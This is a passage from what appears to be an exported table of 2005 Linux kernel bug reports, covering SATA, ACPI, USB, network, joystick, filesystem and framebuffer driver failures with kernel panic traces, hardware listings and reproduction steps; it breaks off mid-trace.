    <t>Distribution: Fedora Core 3 Hardware Environment:single AMD 64, x86_64, SiS964 SATA controller, two SATA disks: scsi1 : sata_sis Vendor: ATA Model: WDC WD1600JD-22H Rev: 08.0 Type: Direct-Access ANSI SCSI revision: 05 Software Environment: 2 mirrored partitions md0 for /boot and md1 for / Problem Description: I hooked up a serial console line and captured the following panic: Mar 17 19:59:43 host32 kernel: ata1: error=0x84 { DriveStatusError BadCRC } ata1: status=0x51 { DriveReady SeekComplete Error } ata1: error=0x84 { DriveStatusError BadCRC } Call Trace:&lt;IRQ&gt; &lt;ffffffffa000648b&gt;{:scsi_mod:scsi_device_unbusy+82} &lt;ffffffffa0001229&gt;{:scsi_mod:scsi_finish_command+23} &lt;ffffffffa00319a6&gt;{:libata:ata_scsi_qc_complete+43} &lt;ffffffffa002e53b&gt;{:libata:ata_qc_complete+311} &lt;ffffffffa002f993&gt;{:libata:ata_interrupt+438} &lt;ffffffff8015dd84&gt;{handle_IRQ_event+41} &lt;ffffffff8015df3d&gt;{__do_IRQ+392} &lt;ffffffff8011141b&gt;{do_IRQ+55} &lt;ffffffff8010ee1f&gt;{ret_from_intr+0} &lt;EOI&gt; &lt;ffffffffa002f4d4&gt;{:libata:ata_eng_timeout+791} &lt;ffffffff801300f5&gt;{default_wake_function+0} &lt;ffffffff8034b3e9&gt;{__down_failed_interruptible+53} &lt;ffffffffa00315ce&gt;{:libata:ata_scsi_error+21} &lt;ffffffffa00050aa&gt;{:scsi_mod:scsi_error_handler+357} &lt;ffffffff8010f303&gt;{child_rip+8} &lt;ffffffffa0004f45&gt;{:scsi_mod:scsi_error_handler+0} &lt;ffffffff8010f2fb&gt;{child_rip+0} Kernel panic - not syncing: drivers/scsi/scsi_lib.c:344: spin_lock(drivers/scsi/libata-core.c:000001001faf0800) already locked by drivers/scsi/libata-core.c/3063 Looking at the code for ata_interrupt() in the 2.6.11.3 kernel source and the kernel-2.6.10-1.770_FC3.src.rpm, I see that it does lock host_lock and that scsi_device_unbusy() tries to lock it again. Clearly, this is a bug. Steps to reproduce: Just do lots of I/O. A mirror resync will hit this fairly quickly. I'm not sure if the drive errors are part of the problem or not.</t>
  </si>
  <si>
    <t>2.6.11.4</t>
  </si>
  <si>
    <t>2005-03-17 23:05 UTC</t>
  </si>
  <si>
    <t>Sanjoy Mahajan</t>
  </si>
  <si>
    <t>2007-02-15 22:18 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: Thinkpad 600X 650MHz Pentium III Software Environment: 2.6.11.4 + ACPI subsystem 20050309 + ibm_acpi 0.10f + XFree 4.3.0.1 Problem Description: After entering S1 state, the screen goes blank but then starts growing fine, rainbow-colored patterns near the middle of the screen and a few horizontal lines. The cruft grows until I hit the Fn key to wake it up. It eventually comes back and the screen is just as it was before the sleep. But various drivers are unhappy. The uhci_hcd driver continuously reports error messages such as hub 1-0:1.0: debounce: port 1: total 1500ms stable 0ms status 0x31f hub 1-0:1.0: connect-debounce failed, port 1 disabled uhci_hcd 0000:00:07.2: port 2 portsc ffff,00 hub 1-0:1.0: over-current change on port 2 hub 1-0:1.0: port 2, status 031f, change 000b, 1.5 Mb/s uhci_hcd 0000:00:07.2: port 2 portsc ffff,00 uhci_hcd 0000:00:07.2: port 2 portsc ffff,00 uhci_hcd 0000:00:07.2: port 2 portsc ffff,00 The messages continue until I modprobe -r the driver and then reload it. But that produces the following warning: USB Universal Host Controller Interface driver v2.2 PCI: Enabling device 0000:00:07.2 (0000 -&gt; 0001) PCI: Found IRQ 11 for device 0000:00:07.2 uhci_hcd 0000:00:07.2: Intel Corp. 82371AB/EB/MB PIIX4 USB uhci_hcd 0000:00:07.2: irq 11, io base 0x4000 uhci_hcd 0000:00:07.2: new USB bus registered, assigned bus number 1 uhci_hcd 0000:00:07.2: detected 8 ports uhci_hcd 0000:00:07.2: port count misdetected? forcing to 2 ports uhci_hcd 0000:00:07.2: USBCMD_HCRESET timed out! uhci_hcd 0000:00:07.2: init error -110 uhci_hcd 0000:00:07.2: remove, state 0 uhci_hcd 0000:00:07.2: roothub graceful disconnect usb_disconnect nodev Uninitialised timer! This is just a warning. Your computer is OK function=0x00000000, data=0x0 [&lt;c011f351&gt;] check_timer_failed+0x61/0x70 [&lt;c011f599&gt;] del_timer+0x19/0x60 [&lt;e498c9c3&gt;] uhci_stop+0x23/0x90 [uhci_hcd] [&lt;c0255417&gt;] usb_hcd_pci_remove+0xb7/0x1c0 [&lt;c02550c6&gt;] usb_hcd_pci_probe+0x316/0x5b0 [&lt;c01d3282&gt;] pci_device_probe_static+0x52/0x70 [&lt;c01d32dc&gt;] __pci_device_probe+0x3c/0x50 [&lt;c01d331c&gt;] pci_device_probe+0x2c/0x50 [&lt;c022713f&gt;] driver_probe_device+0x2f/0x80 [&lt;c022728c&gt;] driver_attach+0x5c/0xa0 [&lt;c02277dd&gt;] bus_add_driver+0x9d/0xd0 [&lt;c0227dff&gt;] driver_register+0x2f/0x40 [&lt;c01d35a4&gt;] pci_register_driver+0x64/0x90 [&lt;e49b109b&gt;] uhci_hcd_init+0x9b/0xf1 [uhci_hcd] [&lt;c012e252&gt;] sys_init_module+0x132/0x1c0 [&lt;c0102f33&gt;] syscall_call+0x7/0xb uhci_hcd 0000:00:07.2: USB bus 1 deregistered uhci_hcd: probe of 0000:00:07.2 failed with error -110 Not surprisingly the USB-connected cell phone (cdc_acm driver) wouldn't behave after those errors (couldn't talk to the /dev/ttyACM0 device). Also the modem in the xircom ethernet/modem combination card wouldn't work either. Both worked fine before the sleep attempt (and are working fine now after rebooting). Also, the thermal-zone settings reset themselves to the default. I had done echo 120:0:40:55:0 &gt; /proc/acpi/thermal_zone/THM2/trip_points to get the damn loud fan to be less aggressive (which worked fine -- an ACPI success for which I am very happy). By the way, I also had to do echo 10 &gt; THM2/polling_frequency to get the change to take effect. But now the polling_frequency is back to 'polling disabled' and the trip_points back to critical (S5): 120 C active[0]: 34 C: devices=0xc1574108 I am using a custom DSDT: The vanilla TP 600X DSDT (from BIOS 1.11) but with a few meager attempts to fix the DSDT recompilation errors and the S3 "missing sleep state object" error (Bug #3534) -- no good or bad effect from the fixes, at least that I could find. I'll attach the output of acpidmp as well as several other hopefully useful files. Steps to reproduce: Boot w/ "apm=off pci=noacpi acpi_sleep=s3_bios" then into X, then "echo 1 &gt; /proc/acpi/sleep", wait a few seconds, then wake up by tapping the Fn key.</t>
  </si>
  <si>
    <t>(sata sii) bug in libata-core with sata_sil</t>
  </si>
  <si>
    <t>2.6.11.[1-5]</t>
  </si>
  <si>
    <t>2005-03-19 18:51 UTC</t>
  </si>
  <si>
    <t>Cole Hoosier</t>
  </si>
  <si>
    <t>2007-06-05 09:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: nforce2 mb, athlon xp, silicon image 3112A SATALink, seagate st3200822as Software Environment: Gentoo - everything current as of last night Problem Description: I get a kernel panic on boot with any 2.6.11 kernel. I've tried it with 2.6.11.1 and 2.6.11.5 from kernel.org, as well as 2.6.11-gentoo-r4. The config is copied from a working 2.6.10 kernel, updated with `yes n | make oldconfig`. It only occurs with the following option enabled: CONFIG_SCSI_SATA_SIL=y I don't know enough to do my own poking around, but I will try anything you throw at me. Here is output that I get leading up to the panic. (I had to retype this all --- I double checked it, but that's not guaranteeing that it's typo free...) ACPI: PCI Interrupt Link [APC4] enabled at IRQ 19 ACPI: PCI Interrupt 0000:01:0b.0[A] -&gt; GSI 19 (level, high) -&gt; IRQ 19 ata1: SATA max UDMA/100 cmd 0xF8810080 ctl 0xF881008A bmdma 0xF8810000 irq 19 ata2: SATA max UDMA/100 cmd 0xF88100C0 ctl 0xF88100CA bmdma 0xF8810008 irq 19 ata1: dev 0 ATA, max UDMA/133, 390721968 sectors: lba48 ata1(0): applying Seagate errata fix ------------[ cut here ]------------ kernel BUG at drivers/scsi/libata-core.c:1926! invalid operand: 0000 [#1] PREEMPT Modules linked in: CPU: 0 EIP: 0060:[&lt;c02f2a68&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.11-gentoo-r4) EIP is at ata_dev_set_xfermode+0xa8/0xc0 eax: 00000000 ebx: f7e62a50 ecx: 00000000 edx: 00000000 esi: f7e629d4 edi: f7e629d4 ebp: f7c00e20 esp: f7c00e18 ds: 007b es: 007b ss: 0068 Process swapper (pid: 1, threadinfo=f7c00000 task=c17ffa00) Stack: f7e629d4 f7e62a50 00000000 f7c00e24 f7c00e24 c0433b00 f7e62a50 f7e629d4 f7e629d4 00000000 c02f1df3 f7e629d4 f7e62a50 0000003f f7e629d4 f7e629d4 f7e629d4 f7e62a50 c02f205d f7e629d4 f7e62a50 00000000 45e629f4 00000000 Call Trace: [&lt;c02f1df3&gt;] ata_dev_set_mode+0x53/0xf0 [&lt;c02f205d&gt;] ata_set_mode+0x7d/0xe0 [&lt;c02f1bd2&gt;] ata_bus_probe+0x82/0xb0 [&lt;c02f4797&gt;] ata_device_add+0x1b7/0x250 [&lt;c02f4060&gt;] ata_interrupt+0x0/0x120 [&lt;c02f6dd5&gt;] sil_init_one+0x2a5/0x350 [&lt;c0249782&gt;] pci_device_probe_static+0x52/0x70 [&lt;c02497db&gt;] __pci_device_probe+0x3b/0x50 [&lt;c024981c&gt;] pci_device_probe+0x2c/0x50 [&lt;c02b2f2f&gt;] driver_probe_device+0x2f/0x80 [&lt;c02b3079&gt;] driver_attach+0x59/0x90 [&lt;c02b3548&gt;] bus_add_driver+0x98/0xd0 [&lt;c02b3b5f&gt;] driver_register+0x2f/0x40 [&lt;c0249a92&gt;] pci_register_driver+0x62/0x80 [&lt;c051717f&gt;] sil_init+0xf/0x20 [&lt;c04fb7fb&gt;] do_initcalls+0x2b/0xc0 [&lt;c01002c0&gt;] init+0x0/0x110 [&lt;c01002c0&gt;] init+0x0/0x110 [&lt;c01002ef&gt;] init+0x2f/0x110 [&lt;c01012ec&gt;] kernel_thread_helper+0x0/0x14 [&lt;c01012f1&gt;] kernel_thread_helper+0x5/0x14 Code: 08 75 21 85 ff 74 14 8b 44 24 2c 89 04 24 e8 30 f3 ff ff 83 c4 18 5b 5e 5f 5d c3 89 e8 e8 a1 32 0f 00 eb ef e8 aa 31 0f 00 eb d8 &lt;0f&gt; 0b 86 07 1d 04 42 c0 eb 87 8d b4 26 00 00 00 00 8d bc 27 00 &lt;0&gt;Kernel panic - not syncing: Attempted to kill init! Steps to reproduce: 1. unpack kernel source 2. copy config-from-2.6.10 ./config 3. yes n | make oldconfig (old config had sata_sil enabled) 4. make all modules_install install 5. boot from new kernel (results in panic above)</t>
  </si>
  <si>
    <t>2005-03-21 01:13 UTC</t>
  </si>
  <si>
    <t>Michel MENGIS</t>
  </si>
  <si>
    <t>2005-10-04 11:19 UTC</t>
  </si>
  <si>
    <t>Dave Airlie</t>
  </si>
  <si>
    <t>Distribution: FC3 Hardware Environment: DELL Latitude D610 Software Environment: .... Problem Description: i915 module doesnt support correctly Intel's 915GM chipset. Steps to reproduce: install a FC3. Build a kernel 2.6.11.4 (with the .config I posted) restart. Try to get more than 800x600. Or: after reboot install intel's latest driver: -&gt; u can get 1280x1024 (only the first time. no more after reboot).</t>
  </si>
  <si>
    <t>(net via_velocity) receiver hang after setting mtu &gt;1500</t>
  </si>
  <si>
    <t>2005-03-21 07:23 UTC</t>
  </si>
  <si>
    <t>Anders Bostr</t>
  </si>
  <si>
    <t>2006-07-14 17:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: A normal PC with Pentium M and a VT6122 PCI board. lspci -vv: 0000:02:04.0 Ethernet controller: VIA Technologies, Inc. VT6120/VT6121/VT6122 Gigabit Ethernet Adapter (rev 11) Subsystem: VIA Technologies, Inc.: Unknown device 0110 Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 201 Region 0: I/O ports at 4000 [size=256] Region 1: Memory at e0201000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D3 PME-Enable- DSel=0 DScale=0 PME- Software Environment: Debian testing with 2.6.8 or 2.6.10 kernel. Problem Description: The via velocity GE-driver isn't working after setting MTU to higher then 1500 (and setting it to lower than 1500 isn't allowed by the driver, see bug 4001). Only a few frames go through after setting the mtu to higher then 1500 (ifconfig ethX mtu 1600), and in some cases no frames at all. The size of the frames don't seem to make any difference. Ethereal indicates that the receiver stops working. Sending of frames still works. When this has occured must the interface be taken down and then up in order to get it working again. Just setting the mtu to 1500 again do not solve the problem. Also, the kernel load was 0.67 when this occured, on an idle system. The load went down to &lt;0.05 after taking the interface down. One oddity in the driver code is this: -------------------------------------------------------------------------- static int velocity_open(struct net_device *dev) { struct velocity_info *vptr = dev-&gt;priv; int ret; vptr-&gt;rx_buf_sz = (dev-&gt;mtu &lt;= 1504 ? PKT_BUF_SZ : dev-&gt;mtu + 32); ret = velocity_init_rings(vptr); -------------------------------------------------------------------------- static int velocity_change_mtu(struct net_device *dev, int new_mtu) { struct velocity_info *vptr = dev-&gt;priv; unsigned long flags; int oldmtu = dev-&gt;mtu; int ret = 0; if ((new_mtu &lt; VELOCITY_MIN_MTU) || new_mtu &gt; (VELOCITY_MAX_MTU)) { VELOCITY_PRT(MSG_LEVEL_ERR, KERN_NOTICE "%s: Invalid MTU.\n", vptr-&gt;dev-&gt;name); return -EINVAL; } if (new_mtu != oldmtu) { spin_lock_irqsave(&amp;vptr-&gt;lock, flags); netif_stop_queue(dev); velocity_shutdown(vptr); velocity_free_td_ring(vptr); velocity_free_rd_ring(vptr); dev-&gt;mtu = new_mtu; if (new_mtu &gt; 8192) vptr-&gt;rx_buf_sz = 9 * 1024; else if (new_mtu &gt; 4096) vptr-&gt;rx_buf_sz = 8192; else vptr-&gt;rx_buf_sz = 4 * 1024; ret = velocity_init_rd_ring(vptr); -------------------------------------------------------------------------- And PKT_BUF_SZ is set to 1540. The resulting size of the rd's isn't the same after changing the mtu to first 1600 and then back to 1500 as when set to 1500 in open. Steps to reproduce: # ifconfig eth0 mtu 1600 Then run ping. / Anders</t>
  </si>
  <si>
    <t>first joystick button mapped to extra number</t>
  </si>
  <si>
    <t>2.6.12-rc1-mm1</t>
  </si>
  <si>
    <t>2005-03-21 23:50 UTC</t>
  </si>
  <si>
    <t>Matthew Mueller</t>
  </si>
  <si>
    <t>2005-06-24 05:21 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Athlon64 3000+, Chaintech vnf3-250 mobo, 1GB ram, SB Audigy (w/game port slot thing attached), Logitech Rumblepad 2 gamepad (usb), MS Sidewinder 3D Pro joystick (gameport) Software Environment: jstest Problem Description: The first button of each of my joysticks did not register as button 0, but instead as an extra button at the end of the list. On kernel 2.6.11.1: Joystick (Microsoft SideWinder 3D Pro) has 6 axes and 9 buttons. Driver version is 2.1.0. When I press the trigger, button 0 is indicated as on. Joystick (Logitech Logitech RumblePad 2 USB) has 6 axes and 12 buttons. Driver version is 2.1.0. When I press the button labelled "1" on the control, jstest indicates button 0 as on. On 2.6.12-rc1-mm1 jstest says: Joystick (Microsoft SideWinder 3D Pro) has 6 axes and 10 buttons. Driver version is 2.1.0. When I press the trigger, button 9 is indicated as on. Joystick (Logitech Logitech RumblePad 2 USB) has 6 axes and 13 buttons. Driver version is 2.1.0. When I press the button labelled "1" on the control, jstest indicates button 12 as on. Steps to reproduce: 1. run jstest &lt;joy device&gt; 2. jstest will say there is one more button than there actually is. 3. press each button on joystick. 4. button 0 never registers, but the extra button number does instead.</t>
  </si>
  <si>
    <t>oops at parse_rock_ridge_inode_internal</t>
  </si>
  <si>
    <t>2.6.11, 2.6.12-rc1</t>
  </si>
  <si>
    <t>2005-03-22 07:01 UTC</t>
  </si>
  <si>
    <t>2005-07-26 14:53 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware Environment: x86, K6-2 550 Software Environment: Gnu C 2.95.4 Gnu make 3.80 binutils 2.15 util-linux 2.12 mount 2.12 module-init-tools implemented e2fsprogs 1.35 reiserfsprogs line reiser4progs line Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.2.1 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.2.1 Problem Description: This was reported to Bugtraq by Michal Zalewski, but I didn't see it hit LKML or Bugzilla. Unable to handle kernel paging request at virtual address 029b4700 printing eip: c01cfd32 *pde = 00000000 Oops: 0000 [#1] PREEMPT CPU: 0 EIP: 0060:[&lt;c01cfd32&gt;] Not tainted VLI EFLAGS: 00010212 (2.6.11) EIP is at parse_rock_ridge_inode_internal+0x542/0x5ac eax: c38a1820 ebx: 000000ed ecx: 0000003b edx: c59af000 esi: 029b4700 edi: c5d8edd8 ebp: c5a7bd98 esp: c5a7bd6c ds: 007b es: 007b ss: 0068 Process mount (pid: 25708, threadinfo=c5a7a000 task=c5b1f930) Stack: c7878d4c c59ae000 c59ae000 0000002a c5d8edd8 000000ed 029b4700 000001ba 00000000 c59ae088 00000000 c5a7bdb4 c01cff1c c59ae000 c7878d4c 00000000 c7878d4c c7878d30 c5a7bdf4 c01ceba0 c59ae000 c7878d4c c7878d4c c49b3b54 Call Trace: [&lt;c01032d1&gt;] show_stack+0x81/0x8c [&lt;c01033f2&gt;] show_registers+0xfa/0x168 [&lt;c010363d&gt;] die+0x159/0x24c [&lt;c010cf5a&gt;] do_page_fault+0x466/0x5f6 [&lt;c0102e0b&gt;] error_code+0x2b/0x30 [&lt;c01cff1c&gt;] parse_rock_ridge_inode+0x14/0x48 [&lt;c01ceba0&gt;] isofs_read_inode+0x290/0x368 [&lt;c01ced03&gt;] isofs_iget+0x4f/0x64 [&lt;c01ce1dd&gt;] isofs_fill_super+0x385/0x4f8 [&lt;c01647ef&gt;] get_sb_bdev+0xe3/0x12c [&lt;c01ced31&gt;] isofs_get_sb+0x19/0x28 [&lt;c01649bc&gt;] do_kern_mount+0x4c/0xcc [&lt;c01649bc&gt;] do_kern_mount+0x4c/0xcc [&lt;c01815b3&gt;] do_new_mount+0x5f/0x7c [&lt;c018209c&gt;] do_mount+0x12c/0x144 [&lt;c018251d&gt;] sys_mount+0x79/0xbc [&lt;c0102ba7&gt;] syscall_call+0x7/0xb Code: 8b 5d f0 53 ff b0 c8 00 00 00 e8 ae f3 f8 ff 83 c4 0c 85 c0 74 53 8b 50 18 8b 4d e8 8b 7d e4 01 55 ec 8b 75 ec 8b 5d e8 c1 e9 02 &lt;f3&gt; a5 f6 c3 02 74 02 66 a5 f6 c3 01 74 01 a4 50 e8 19 ef f8 ff Steps to reproduce: Original Bugtraq poster included a program to reproduce.</t>
  </si>
  <si>
    <t>tridentfb with ACCEL leaves artefacts when scrolling</t>
  </si>
  <si>
    <t>2.6.11.5</t>
  </si>
  <si>
    <t>2005-03-22 08:15 UTC</t>
  </si>
  <si>
    <t>2005-08-31 01:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/sarge Hardware Environment: Mini-ITX with trident on board, C3 CPU Problem Description: When compiling tridentfb with CONFIG_FB_TRIDENT=y CONFIG_FB_TRIDENT_ACCEL=y booting leaves the end of long lines in the last line on screen when scrolling. When X is running, scrolling puts garbage on the screen (looks like X data) Console switch fixes the screen. Behaviour seems to be identical with noaccel and without on the video=tridentfb parameter in lilo.conf.</t>
  </si>
  <si>
    <t>Artem S. Tashkinov</t>
  </si>
  <si>
    <t>sleeping function called from invalid context at kernel/workqueue.c:264</t>
  </si>
  <si>
    <t>2.6.12-rc1-mm1 2.6.12-rc1-mm2</t>
  </si>
  <si>
    <t>2005-03-24 13:11 UTC</t>
  </si>
  <si>
    <t>2005-03-25 10:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 10.2rc1 Hardware Environment: desktop box, Athon XP 1600+, Via 82cxx chipset Problem Description: Unplugging my USB memory results in the following messages in dmesg : sb 1-1: USB disconnect, address 3 Debug: sleeping function called from invalid context at kernel/workqueue.c:264 in_atomic():0, irqs_disabled():1 [&lt;c0103846&gt;] dump_stack+0x15/0x17 [&lt;c0113c51&gt;] __might_sleep+0x8a/0x94 [&lt;c0121c21&gt;] flush_workqueue+0x15/0x30 [&lt;c01fc187&gt;] as_exit_queue+0x14/0x58 [&lt;c01f4a61&gt;] elevator_exit+0x13/0x2b [&lt;c01f68cb&gt;] blk_cleanup_queue+0x3d/0x82 [&lt;d5c98326&gt;] ub_cleanup+0x15/0x34 [ub] [&lt;d5c99b1b&gt;] ub_disconnect+0xf6/0x103 [ub] [&lt;d18810a4&gt;] usb_unbind_interface+0x34/0x5e [usbcore] [&lt;c01f1af4&gt;] device_release_driver+0x5d/0x74 [&lt;c01f13b9&gt;] bus_remove_device+0x7e/0xbf [&lt;c01f088c&gt;] device_del+0x69/0x9a [&lt;d1887339&gt;] usb_disable_device+0x75/0xdf [usbcore] [&lt;d1882c9b&gt;] usb_disconnect+0xb2/0x10d [usbcore] [&lt;d1883ff8&gt;] hub_port_connect_change+0x54/0x2e7 [usbcore] [&lt;d18844f1&gt;] hub_events+0x266/0x30a [usbcore] [&lt;d18845b6&gt;] hub_thread+0x21/0xdd [usbcore] [&lt;c010126d&gt;] kernel_thread_helper+0x5/0xb This problem does not appear in 2.6.11.5. lsusb output ~~~~~~~~~~~~ I'm using the ub driver (compiled as a module). Bus 002 Device 002: ID 046d:08a2 Logitech, Inc. # my webcam Bus 002 Device 001: ID 0000:0000 Bus 001 Device 004: ID 0ea0:6803 Ours Technology, Inc. OTI-6803 Flash Disk # my memory stick Bus 001 Device 002: ID 044f:b303 ThrustMaster, Inc. # my joystick Bus 001 Device 001: ID 0000:0000 lspci output ~~~~~~~~~~~~ 00:00.0 Host bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133] (rev 03) 00:01.0 PCI bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133 AGP] 00:04.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 40) 00:04.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) 00:04.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 16) 00:04.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 16) 00:04.4 Bridge: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 40) 00:09.0 Multimedia audio controller: Ensoniq 5880 AudioPCI (rev 02) 00:0a.0 FireWire (IEEE 1394): Agere Systems (former Lucent Microelectronics) FW323 (rev 04) 00:0d.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8029(AS) 01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev b2) Steps to reproduce: Plug in your USB memory, wait a few seconds, then unplug it... easy, isn't it ? ;-)</t>
  </si>
  <si>
    <t>Enable C2,C3 on SMP systems</t>
  </si>
  <si>
    <t>2005-03-25 15:29 UTC</t>
  </si>
  <si>
    <t>2005-08-03 18:45 UTC</t>
  </si>
  <si>
    <t>C2 and C3 are disabled on an SMP system. Enable it.</t>
  </si>
  <si>
    <t>atomic counter underflow in smbfs</t>
  </si>
  <si>
    <t>2.6.12-rc1-mm3</t>
  </si>
  <si>
    <t>2005-03-25 23:38 UTC</t>
  </si>
  <si>
    <t>2006-04-23 08:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Problem Description: File operations on smbfs fail frequently with the following traces in dmesg: smb_proc_readX_data: offset is larger than SMB_READX_MAX_PAD or negative! smb_proc_readX_data: -35 &gt; 64 || -35 &lt; 0 smb_add_request: request [e1b2ce60, mid=400] timed out! BUG: atomic counter underflow at: [&lt;e9aa9df0&gt;] smb_rput+0x50/0x60 [smbfs] [&lt;e9aa3a3c&gt;] smb_proc_readX+0xdc/0xf0 [smbfs] [&lt;e9aa8d77&gt;] smb_readpage_sync+0x97/0x120 [smbfs] [&lt;e9aa8e17&gt;] smb_readpage+0x17/0x60 [smbfs] [&lt;c0134b80&gt;] read_pages+0xf0/0x140 [&lt;c0134c7e&gt;] __do_page_cache_readahead+0xae/0x100 [&lt;c0134e11&gt;] blockable_page_cache_readahead+0x51/0xd0 [&lt;c0134f03&gt;] make_ahead_window+0x73/0xb0 [&lt;c0134ff3&gt;] page_cache_readahead+0xb3/0x170 [&lt;c012ed2c&gt;] do_generic_mapping_read+0x53c/0x550 [&lt;e9aa52b0&gt;] smb_proc_getattr_trans2+0x80/0xf0 [smbfs] [&lt;c012efb7&gt;] __generic_file_aio_read+0x1a7/0x1f0 [&lt;c012ed40&gt;] file_read_actor+0x0/0xd0 [&lt;c012f10c&gt;] generic_file_read+0x9c/0xc0 [&lt;c0124850&gt;] autoremove_wake_function+0x0/0x50 [&lt;e9aa912e&gt;] smb_file_read+0x7e/0x90 [smbfs] [&lt;c0148114&gt;] vfs_read+0xb4/0x140 [&lt;c0148407&gt;] sys_read+0x47/0x80 [&lt;c0102975&gt;] syscall_call+0x7/0xb Even just listing smbfs mount points will cause trouble: BUG: atomic counter underflow at: [&lt;e9aa9df0&gt;] smb_rput+0x50/0x60 [smbfs] [&lt;e9aa5516&gt;] smb_proc_getattr_trans2_all+0xd6/0xf0 [smbfs] [&lt;c01543c9&gt;] follow_mount+0x59/0xb0 [&lt;e9aa5835&gt;] smb_proc_getattr+0x35/0x60 [smbfs] [&lt;e9aa80c3&gt;] smb_refresh_inode+0x23/0x120 [smbfs] [&lt;e9aa81f4&gt;] smb_revalidate_inode+0x34/0x40 [smbfs] [&lt;e9aa89e9&gt;] smb_getattr+0x19/0x40 [smbfs] [&lt;e9aa89d0&gt;] smb_getattr+0x0/0x40 [smbfs] [&lt;c015071a&gt;] vfs_getattr+0x2a/0x90 [&lt;c0150810&gt;] vfs_lstat+0x40/0x50 [&lt;c0150e52&gt;] sys_lstat64+0x12/0x30 [&lt;c010db70&gt;] do_page_fault+0x0/0x581 [&lt;c0102975&gt;] syscall_call+0x7/0xb If it matters, the local SMB client is samba 2.2.10, and the remote SMB server is samba 2.2.10 as well. Steps to reproduce: cat /mnt/some_smbfs/some_file &gt; /dev/null or ls -l /mnt (where some mount points have smbfs type) Grep'ing through the logs reveals that the problem never happened before this morning so the problem has to be new in 2.6.12-rc1-mm3</t>
  </si>
  <si>
    <t>cdc_acm oops on audiovox 9900 if usb disconnect while in pppd call</t>
  </si>
  <si>
    <t>2.6.10, 2.6.11-mm1</t>
  </si>
  <si>
    <t>2005-03-26 18:32 UTC</t>
  </si>
  <si>
    <t>Matt Anderson</t>
  </si>
  <si>
    <t>2005-08-18 13:49 UTC</t>
  </si>
  <si>
    <t>4418 4715</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: Pentium 4 M, 786mb ram, and Dual P4 Xeon 2.4ghz, 1.5gb ram Software Environment: pppd version 2.4.2 devfs Problem Description: The Audiovox 9900 cellphone from Verizon can be used to make a data call as a usb acm modem. If while pppd is in a call and the cellphone is disconnected the kernel oops' with the following dmsg output (in this case the phone has reset itself): usb 1-1.3: USB disconnect, address 13 Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: c0243b5b *pde = 00000000 Oops: 0000 [#1] PREEMPT SMP Modules linked in: msdos fat ppp_deflate zlib_deflate zlib_inflate bsd_comp ppp_async cr c_ccitt ppp_generic slhc ipt_MASQUERADE ipt_LOG ipt_state iptable_nat ip_conntrack iptab le_filter ip_tables nvidia vmnet vmmon snd_seq_midi snd_emu10k1_synth snd_emux_synth snd _seq_virmidi snd_seq_midi_emul snd_pcm_oss snd_mixer_oss snd_seq_oss snd_seq_midi_event snd_seq snd_emu10k1 snd_rawmidi snd_seq_device snd_ac97_codec snd_pcm snd_timer snd_page _alloc snd_util_mem snd_hwdep snd soundcore cdc_acm CPU: 0 EIP: 0060:[&lt;c0243b5b&gt;] Tainted: P VLI EFLAGS: 00010246 (2.6.11-mm1) EIP is at get_kobj_path_length+0x1a/0x31 eax: 00000000 ebx: 00000000 ecx: ffffffff edx: f64745b8 esi: 00000001 edi: 00000000 ebp: ffffffff esp: e7819d7c ds: 007b es: 007b ss: 0068 Process pppd (pid: 26671, threadinfo=e7818000 task=c295e530) Stack: f57ccc53 f6474594 f55c2218 f64745b8 c0243be0 f64745b8 00000286 00000000 00000000 f57ccc53 f6474594 f55c2218 000003ad c02c8167 f64745b8 000000d0 c047f928 00000246 f565fb20 ffffffff ffffffff fffffffd c047fc00 00000000 Call Trace: [&lt;c0243be0&gt;] kobject_get_path+0x1f/0x77 [&lt;c02c8167&gt;] class_hotplug+0xb3/0x235 [&lt;c02447c3&gt;] kobject_hotplug+0x1d8/0x2e4 [&lt;c024403e&gt;] kobject_release+0x0/0xa [&lt;c0243f52&gt;] kobject_del+0x18/0x2d [&lt;c02c8680&gt;] class_device_del+0xae/0xba [&lt;f886e419&gt;] acm_tty_close+0x0/0x102 [cdc_acm] [&lt;c02c869c&gt;] class_device_unregister+0x10/0x1d [&lt;f886e4df&gt;] acm_tty_close+0xc6/0x102 [cdc_acm] [&lt;c02903ce&gt;] release_dev+0x6ec/0x825 [&lt;c0116e4a&gt;] finish_task_switch+0x3a/0xb7 [&lt;c03cd041&gt;] schedule+0x389/0xba8 [&lt;c012609f&gt;] del_timer_sync+0x94/0xda [&lt;c02965ea&gt;] inotify_dentry_parent_queue_event+0x35/0xb5 [&lt;c0126106&gt;] del_singleshot_timer_sync+0x21/0x32 